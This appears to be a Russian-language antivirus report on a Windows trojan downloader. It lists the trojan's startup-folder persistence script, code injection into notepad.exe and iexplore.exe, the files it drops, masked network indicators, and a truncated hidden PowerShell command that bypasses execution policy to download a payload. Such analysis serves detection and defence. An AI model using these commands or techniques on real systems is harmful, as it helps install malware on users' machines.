Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- %APPDATA%\microsoft\windows\start menu\programs\startup\mstsc.vbs
Вредоносные функции
Загружает файлы и запускает на исполнение.
Внедряет код в
следующие системные процессы:
- %WINDIR%\notepad.exe
следующие пользовательские процессы:
- iexplore.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\mstsc.vbs
- %TEMP%\setup.exe
- %PROGRAMDATA%\mxpqmxhlwd\083626eddd_3.0.0
- %PROGRAMDATA%\mxpqmxhlwd\cfgi
- %PROGRAMDATA%\mxpqmxhlwd\cfg
- %PROGRAMDATA%\mxpqmxhlwd\dll2
- %PROGRAMDATA%\mxpqmxhlwd\r.vbs
Удаляет следующие файлы
- %PROGRAMDATA%\mxpqmxhlwd\r.vbs
Подменяет следующие файлы
- %PROGRAMDATA%\mxpqmxhlwd\r.vbs
Сетевая активность
TCP
Запросы HTTP GET
- http://18#.#1.157.188/min1/load5305895393572.jpg
UDP
- DNS ASK pa###bin.com
Другое
Ищет следующие окна
- ClassName: 'EDIT' WindowName: ''
Создает и запускает на исполнение
- '%WINDIR%\syswow64\wscript.exe' "%TEMP%\mstsc.vbs"
- '%TEMP%\setup.exe'
- '%WINDIR%\syswow64\cmd.exe' /c <SYSTEM32>\WindowsPowerShell\v1.0\Powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$...' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c <SYSTEM32>\WindowsPowerShell\v1.0\Powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$...
- '%WINDIR%\syswow64\cmd.exe'
- '%WINDIR%\notepad.exe' -c "%PROGRAMDATA%\MXPqmXhLWd\cfg"
- '%WINDIR%\syswow64\cmd.exe' /C WScript "%PROGRAMDATA%\MXPqmXhLWd\r.vbs"
